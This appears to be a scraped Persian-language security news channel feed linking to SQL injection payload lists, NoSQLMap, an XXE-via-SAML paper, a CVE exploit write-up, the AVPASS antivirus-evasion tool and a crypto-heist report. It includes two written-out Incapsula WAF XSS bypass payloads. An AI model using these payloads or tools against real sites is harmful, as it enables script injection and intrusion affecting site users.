SQL-Injection-Payloads-master.zip
8.2 KB
پیلود های SQLI برای استفاده در Burp Suite و OWASP Zed Attack Proxy
هکر ناشناسی با هک کردن Enigma موفق به سرقت Ethereum به ارزش 471 هزار دلار شد.
https://securityaffairs.co/wordpress/62219/hacking/enigma-platform-hacked.html
#cryptocurrency
#btc
#ethereum
https://securityaffairs.co/wordpress/62219/hacking/enigma-platform-hacked.html
#cryptocurrency
#btc
#ethereum
Security Affairs
Enigma platform hacked, hackers stole over $470,000 worth of Ethereum
Another cyber heist made the headlines, this time an unknown hacker has stolen more than $471,000 worth of Ethereum cryptocurrency.
NoSQLMap – Automated NoSQL Exploitation Tool
https://www.darknet.org.uk/2017/08/nosqlmap-automated-nosql-exploitation-tool/
#nosql
#injection
#pentest
#web
#database
https://www.darknet.org.uk/2017/08/nosqlmap-automated-nosql-exploitation-tool/
#nosql
#injection
#pentest
#web
#database
out-of-band-xml-external-entity-injection-via-saml-redacted.pdf
267.5 KB
Out of Band
XML External Entity Injection via SAML SSO
XML External Entity Injection via SAML SSO
اوراکل قصد داره سورس J2E رو باز کنه!
https://www.techworm.net/2017/08/oracle-open-source-java-enterprise-edition-java-ee.html
https://www.techworm.net/2017/08/oracle-open-source-java-enterprise-edition-java-ee.html
Incapsula WAF XSS bypass
1) <iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>
1) <iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>
آموزش محدود کردن دسترسی کاربران در لینوکس
https://linuxconfig.org/how-to-restrict-users-access-on-a-linux-machine
#linux
https://linuxconfig.org/how-to-restrict-users-access-on-a-linux-machine
#linux
LinuxConfig
How to restrict users access on a Linux machine
Learn how to restrict users access on a Linux machine EASY In this tutorial we are going to learn how to restrict access to a Linux machine by interacting with two files: , which let us specify from…
ماشین حساب ویندوز از اینترنت استفاده میکند!
این دسترسی ظاهرا برای به روزرسانی نرخ ارز هست.
https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator
#windows
#malware
این دسترسی ظاهرا برای به روزرسانی نرخ ارز هست.
https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator
#windows
#malware
کشف و اکسپلویت کردن باگ SQL Injection
https://gbhackers.com/sqlmap-detecting-exploiting-sql-injection/
#sqli
#web
#pentest
https://gbhackers.com/sqlmap-detecting-exploiting-sql-injection/
#sqli
#web
#pentest
نکاتی برای کشف باگ SQLi
https://gerbenjavado.com/manual-sql-injection-discovery-tips/
#web
#sqli
#pentest
https://gerbenjavado.com/manual-sql-injection-discovery-tips/
#web
#sqli
#pentest
اثبات اکسپلویت CVE-2017-8625
https://posts.specterops.io/umci-vs-internet-explorer-exploring-cve-2017-8625-3946536c6442
#windows
#exploit
#js
#ps
https://posts.specterops.io/umci-vs-internet-explorer-exploring-cve-2017-8625-3946536c6442
#windows
#exploit
#js
#ps
AVPASS
AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logics by using the leaked information coupled with APK obfuscation techniques.
https://github.com/sslab-gatech/avpass
#android
#smartsecurity
#malware
#trojan
AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logics by using the leaked information coupled with APK obfuscation techniques.
https://github.com/sslab-gatech/avpass
#android
#smartsecurity
#malware
#trojan
GitHub
GitHub - sslab-gatech/avpass: Tool for leaking and bypassing Android malware detection system
Tool for leaking and bypassing Android malware detection system - sslab-gatech/avpass
کشف سرور نگهداری کننده اطلاعات کاربران با استفاده از فایل pdf
https://www.ringzerolabs.com/2017/08/large-victim-credential-server.html
https://www.ringzerolabs.com/2017/08/large-victim-credential-server.html
Ringzerolabs
Large Victim Credential Server Uncovered
Large Victim Credential Server Uncovered Via PDF Phishing